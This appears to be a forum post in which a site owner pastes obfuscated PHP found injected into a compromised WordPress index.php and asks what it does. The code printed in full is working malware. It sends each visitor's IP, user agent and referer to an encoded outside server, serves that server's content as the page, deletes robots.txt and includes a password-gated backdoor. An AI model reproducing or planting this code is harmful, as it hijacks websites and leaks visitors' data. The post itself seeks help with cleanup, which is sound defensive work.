Strange php code appeared after wordpress was compromised
This code seemed to have appeared at the top of index.php after wordpress was compromised: <?php $O0_OO00__O=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO__O000_O=$O0_OO00__O[42].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[31].$O0_OO00__O[10].$O0_OO00__O[65].$O0_OO00__O[31].$O0_OO00__O[13].$O0_OO00__O[10].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[31].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[40];$OO00_O__0O=$O0_OO00__O[45].$O0_OO00__O[13].$O0_OO00__O[13].$O0_OO00__O[44].$O0_OO00__O[10].$O0_OO00__O[3].$O0_OO00__O[60].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[34].$O0_OO00__O[10].$O0_OO00__O[43].$O0_OO00__O[60].$O0_OO00__O[31].$O0_OO00__O[53].$O0_OO00__O[55];$O0_0OO_O0_=$O0_OO00__O[3].$O0_OO00__O[21].$O0_OO00__O[40].$O0_OO00__O[31].$O0_OO00__O[62].$O0_OO00__O[58].$O0_OO00__O[10].$O0_OO00__O[34].$O0_OO00__O[31].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[34].$O0_OO00__O[31];$OO_0_OO00_=$O0_OO00__O[65].$O0_OO00__O[59].$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[46].$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[31].$O0_OO00__O[40].$O0_OO00__O[40];$O___00O0OO=$O0_OO00__O[42].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[31].$O0_OO00__O[10].$O0_OO00__O[31].$O0_OO00__O[15].$O0_OO00__O[63].$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[40];$O00O_O_0O_=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[31].$O0_OO00__O[13].$O0_OO00__O[0].$O0_OO00__O[44].$O0_OO00__O[13];$OO00___O0O=$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[31].$O0_OO00__O[65].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[44].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[13];$OO_0_O_00O=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[56].$O0_OO00__O[39].$O0_OO00__O[0].$O0_OO00__O[40].$O0_OO00__O[31];$O0_O_00_OO=$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[53].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[44].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[13];$O_0O__OO00=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[63].$O0_OO00__O[13];$O00O_0O_O_=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[31].$O0_OO00__O[15].$O0_OO00__O[31].$O0_OO00__O[56];$O__0O0O_O0=$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[53].$O0_OO00__O[21].$O0_OO00__O[55].$O0_OO00__O[10].$O0_OO00__O[44].$O0_OO00__O[0].$O0_OO00__O[44];$O0O___0OO0=$O0_OO00__O[50].$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[10].$O0_OO00__O[34].$O0_OO00__O[60].$O0_OO00__O[46].$O0_OO00__O[44];$O__O_O00O0=$O0_OO00__O[63].$O0_OO00__O[40].$O0_OO00__O[10].$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[53].$O0_OO00__O[21].$O0_OO00__O[55];$O___0O0O0O=$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[10].$O0_OO00__O[53];$O000_O_O_O=$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[25];$O0OO___O00=$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[53].$O0_OO00__O[44].$O0_OO00__O[0].$O0_OO00__O[40];$O00_OO_0O_=$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[13];$O0O0_O_0_O=$O0_OO00__O[46].$O0_OO00__O[34].$O0_OO00__O[9];function O00O___O0O($googleUrl,$O_O_0_O0O0,$params){$O_O0_00OO_='https://%s/ping?sitemap=%s%s/%s';$O_0OO00_O_=sprintf($O_O0_00OO_,$googleUrl,$params['protocol'],$params['server_domain'],$O_O_0_O0O0);$O00_O0OO__=OO__000OO_($O_0OO00_O_);if(isset($_REQUEST['st'])){${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($O_0OO00_O_);${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($O00_O0OO__);die();}$OO__00OO_0='google';$O0_0O_O_O0='success';$O_O_OO00_0='failed';if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx4fx5fx5fx5fx4fx30x30"]($O00_O0OO__,$OO__00OO_0)!=false){die($O0_0O_O_O0);}else{$O_O0_00OO_='http://%s/ping?sitemap=%s%s/%s';$O_0OO00_O_=sprintf($O_O0_00OO_,$googleUrl,$params['protocol'],$params['server_domain'],$O_O_0_O0O0);$O00_O0OO__=OO__000OO_($O_0OO00_O_);if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx4fx5fx5fx5fx4fx30x30"]($O00_O0OO__,$OO__00OO_0)!=false){die($O0_0O_O_O0);}die($O_O_OO00_0);}}function OO__000OO_($url,$O0OO_00_O_='',$O00O_0_O_O=''){if($O0OO_00_O_==''){$OO_0_OO0_0=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx5fx4fx30x30x30x5fx4f"]($url);if($OO_0_OO0_0){return $OO_0_OO0_0;}}$OO0_OO_00_=${"x47x4cx4fx42x41x4cx53"}["x4fx5fx30x4fx5fx5fx4fx4fx30x30"]();${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_URL,$url);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_USERAGENT,$O00O_0_O_O);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_RETURNTRANSFER,1);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_TIMEOUT,20);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_FRESH_CONNECT,TRUE);if($O0OO_00_O_!=''){${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_POST,1);if(${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx4fx5fx4fx30x30x4fx30"]($O0OO_00_O_)){${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_POSTFIELDS,${"x47x4cx4fx42x41x4cx53"}["x4fx4fx30x30x5fx4fx5fx5fx30x4f"]($O0OO_00_O_));}}$OO_0_OO0_0=${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx30x4fx5fx4fx5f"]($OO0_OO_00_);${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx30x5fx4fx5fx30x30x4f"]($OO0_OO_00_);return $OO_0_OO0_0;}function OO_00__O0O(){if(${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx5fx30x30x4fx30x4fx4f"]('robots.txt')){@${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x30x5fx4fx5fx4fx5fx4f"]('robots.txt');}}$O_O0O_0_O0="jaAHqRd0vcxDaoKvVLTzXUIxEMtDwMxtLYT2Pgh0cLbXfYs2vODSC5PuVaXWgNDlDdwHrJS5gZOXaQguzevHyli6";$O_00_0_OOO=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx4fx5fx30x30x5fx4fx4f"]($O_O0O_0_O0);$O0O0O_O__0='';for ($OO_0O_O_00=0;$OO_0O_O_00<${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x5fx4fx4fx5fx30x4fx5f"]($O_00_0_OOO);$OO_0O_O_00++){if($OO_0O_O_00%2!=0){$O0O0O_O__0.=$O_00_0_OOO[$OO_0O_O_00];}}$params['default_params']=$O_O0O_0_O0;$params['api']=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($O0O0O_O__0);$params['server_domain'] =isset(${"x5fx53x45x52x56x45x52"}['HTTP_HOST'])?${"x5fx53x45x52x56x45x52"}['HTTP_HOST']:${"x5fx53x45x52x56x45x52"}['SERVER_NAME'];$params['request_url']=${"x5fx53x45x52x56x45x52"}['REQUEST_URI'];$params['referer']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_REFERER'])?${"x5fx53x45x52x56x45x52"}['HTTP_REFERER']:'';$params['user_agent']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_USER_AGENT'])?${"x5fx53x45x52x56x45x52"}['HTTP_USER_AGENT']:'';$params['ip']=isset(${"x5fx53x45x52x56x45x52"}["HTTP_VIA"])?${"x5fx53x45x52x56x45x52"}["HTTP_X_FORWARDED_FOR"]:${"x5fx53x45x52x56x45x52"}["REMOTE_ADDR"];$params['protocol']=isset(${"x5fx53x45x52x56x45x52"}['HTTPS'])?'https://':'http://';$params['language']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_ACCEPT_LANGUAGE'])?${"x5fx53x45x52x56x45x52"}['HTTP_ACCEPT_LANGUAGE']:'';if(isset($_REQUEST['params'])) {${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx5fx30x4fx30x4fx30x4f"]($params);die();}if(isset($_REQUEST['pwd163'])){if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx30x5fx4fx5fx30x5fx4f"]($_REQUEST['pwd163']."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"x5fx47x45x54"}['sitemap'])){$O_O_0_O0O0=${"x5fx47x45x54"}['sitemap'];$O0_0O_0_OO='www.google.com';if(isset(${"x5fx47x45x54"}['google_url'])){$O0_0O_0_OO=${"x5fx47x45x54"}['google_url'];}O00O___O0O($O0_0O_0_OO,$O_O_0_O0O0,$params);}}}OO_00__O0O();$O_O_00_OO0=array('domain'=>$params['server_domain'],'request_url'=>$params['request_url'],'ip'=>$params['ip'],'agent'=>$params['user_agent'],'referer'=>$params['referer'],'protocol'=>$params['protocol'],'language'=>$params['language']);$OOO00__0_O=OO__000OO_($params['api'],$O_O_00_OO0,$params['server_domain']);if(isset($_REQUEST['dump'])){${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($OOO00__0_O);$OOO00__0_O=OO__000OO_("http://google.co.jp");${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($OOO00__0_O);die();}$OOO00__0_O=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx30x5fx4fx4fx30x30x5f"](${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($OOO00__0_O));$OO000___OO=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx30x30x5fx5fx5fx4fx30x4f"]("/\|/si",$OOO00__0_O,-1,PREG_SPLIT_NO_EMPTY);if($OO000___OO!==false){$O0OO_00_O_=${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx30x4fx30x4fx5fx4fx30"]($OO000___OO);$O0OO_00_O_=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($O0OO_00_O_);foreach($OO000___OO as $header){@header($header);}echo $O0OO_00_O_;die();} ?> Has someone an idea what it is about? Thanks in advance.…